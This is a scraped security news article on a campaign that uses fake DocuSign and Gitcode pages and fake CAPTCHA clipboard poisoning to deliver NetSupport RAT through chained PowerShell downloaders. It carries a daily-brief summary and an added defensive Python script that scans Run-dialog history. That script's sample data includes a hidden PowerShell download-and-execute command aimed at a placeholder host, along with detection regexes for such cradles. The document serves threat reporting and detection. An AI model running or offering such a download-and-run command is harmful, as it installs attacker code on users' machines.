Article Details

Scrape Timestamp (UTC): 2025-06-03 15:10:16.030

Source: https://thehackernews.com/2025/06/fake-docusign-gitcode-sites-spread.html

Original Article Text


Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack

Threat hunters are alerting to a new campaign that employs deceptive websites to trick unsuspecting users into executing malicious PowerShell scripts on their machines and infect them with the NetSupport RAT malware.

The DomainTools Investigations (DTI) team said it identified "malicious multi-stage downloader Powershell scripts" hosted on lure websites that masquerade as Gitcode and DocuSign.

"These sites attempt to deceive users into copying and running an initial PowerShell script on their Windows Run command," the company said in a technical report shared with The Hacker News. "Upon doing so, the PowerShell script downloads another downloader script and executes on the system, which in turn retrieves additional payloads and executes them, eventually installing NetSupport RAT on the infected machines."

It's believed that these counterfeit sites may be propagated via social engineering attempts over email and/or social media platforms.

The PowerShell scripts hosted on the fake Gitcode sites are designed to download a series of intermediate PowerShell scripts from an external server ("tradingviewtool[.]com") that are used in succession to launch NetSupport RAT on victim machines.

DomainTools said it also identified several websites spoofing DocuSign (e.g., docusign.sa[.]com) to deliver the same remote access trojan but with a twist: using ClickFix-style CAPTCHA verifications to dupe victims into running the malicious PowerShell script. Like the recently documented attack chains delivering the EDDIESTEALER infostealer, users who land on the pages are asked to prove they are not a robot by completing the check.

Triggering the CAPTCHA verification causes an obfuscated PowerShell command to be clandestinely copied to the user's clipboard -- a technique called clipboard poisoning -- after which they are instructed to launch the Windows Run dialog ("Win + R"), paste ("CTRL + V"), and press Enter, causing the script to be executed in the process.

The PowerShell script works by downloading a persistence script ("wbdims.exe") from GitHub to ensure that the payload is launched automatically when the user logs in to the system.

"While this payload was no longer available during the time of investigation, the expectation is that it checks in with the delivery site via 'docusign.sa[.]com/verification/c.php,'" DomainTools said. "Upon doing so, it triggers a refresh in the browser for the page to display the content of 'docusign.sa[.]com/verification/s.php?an=1.'"

This results in the delivery of a second-stage PowerShell script, which then downloads and executes a third-stage ZIP payload from the same server by setting the URL parameter "an" to "2." The script proceeds to unpack the archive and run an executable named "jp2launcher.exe" present within it, ultimately leading to the deployment of NetSupport RAT.

"The multiple stages of scripts downloading and running scripts that download and run yet more scripts is likely an attempt to evade detection and be more resilient to security investigations and takedowns," the company said.

It's currently not clear who is behind the campaign, but DomainTools pointed out that it identified similar delivery URL, domain naming, and registration patterns in connection with a SocGholish (aka FakeUpdates) campaign detected in October 2024.

"Notably, the techniques involved are commonplace and NetSupport Manager is a legitimate administration tool known to be leveraged as a RAT by multiple threat groups such as FIN7, Scarlet Goldfinch, Storm-0408, and others."
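The Win + R step described above leaves a forensic trace: Windows records each Run-dialog command under the RunMRU registry key. The following added triage routine (not from the article or DomainTools; the indicator regexes and the RunMRU snapshot are constructed assumptions) flags Run-dialog entries that combine a script host with a download cradle, hidden-window flag or remote URL, which is the ClickFix signature a responder would hunt for.

```python
import re

# Constructed RunMRU snapshot (not from the article). Windows stores each Run-dialog
# entry as a REG_SZ value ending in "\1"; "MRUList" orders the keys, most recent first.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "powershell -w hidden -c \"iex (irm 'http://example.invalid/verification/s.php?an=1')\"\\1",
    "c": "cmd\\1",
    "MRUList": "bca",
}

# Defender-side indicators drawn from the ClickFix chain described in the article.
# These regexes are assumptions for illustration, not DomainTools' own signatures.
INDICATORS = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|cmd)(\.exe)?\b", re.I),
    "download_cradle": re.compile(
        r"\b(iex|invoke-expression|irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy)?\s+bypass", re.I),
    "remote_url": re.compile(r"https?://[^\s'\"]+", re.I),
}

def strip_mru_suffix(value: str) -> str:
    """Remove the trailing "\\1" marker Windows appends to RunMRU values."""
    return value[:-2] if value.endswith("\\1") else value

def score_entry(command: str) -> list[str]:
    """Return the names of the indicators matched by one Run-dialog command."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]

def triage_runmru(runmru: dict[str, str], min_hits: int = 2) -> list[dict]:
    """Walk RunMRU in most-recent-first order and report suspicious entries."""
    findings = []
    for key in runmru.get("MRUList", ""):
        cmd = strip_mru_suffix(runmru.get(key, ""))
        hits = score_entry(cmd)
        # A bare script host (e.g. "cmd") is benign; require a cradle, URL or
        # hidden-window flag alongside it before raising a finding.
        if "script_host" in hits and len(hits) >= min_hits:
            findings.append({"key": key, "command": cmd, "indicators": hits})
    return findings

if __name__ == "__main__":
    for f in triage_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU {f['key']}: {f['indicators']} -> {f['command']}")
```

On a live host the same logic applies to the values exported from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, ideally correlated with PowerShell script-block logging for the download stages.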

Daily Brief Summary

MALWARE // Deceptive Websites Deploy NetSupport RAT Using Multi-Stage PowerShell Scripts

Threat hunters have discovered a malicious campaign using fake DocuSign and Gitcode sites to spread NetSupport RAT via complex PowerShell scripts.

The initial contact with victims often starts through social engineering methods, using emails or social media, directing them to these malicious websites.

The attack sequence begins with victims being tricked into executing a PowerShell script that triggers multi-stage downloads and installations of the malware.

One distinct method involves a clipboard poisoning attack, in which a fake CAPTCHA verification dupes users into unwittingly copying and running a malicious script.

The PowerShell scripts download further scripts and eventually the NetSupport RAT from an attacker-controlled server masquerading as a legitimate service.

This multi-layered execution strategy aims to bypass detection systems and remains resilient against simple security takedowns.

The URLs and domain patterns used in the attack share similarities with previous campaigns known to involve SocGholish, suggesting a potentially larger organized threat.

Although NetSupport Manager is a legitimate tool, it's often abused by multiple threat actors to gain unauthorized remote access to victims' systems.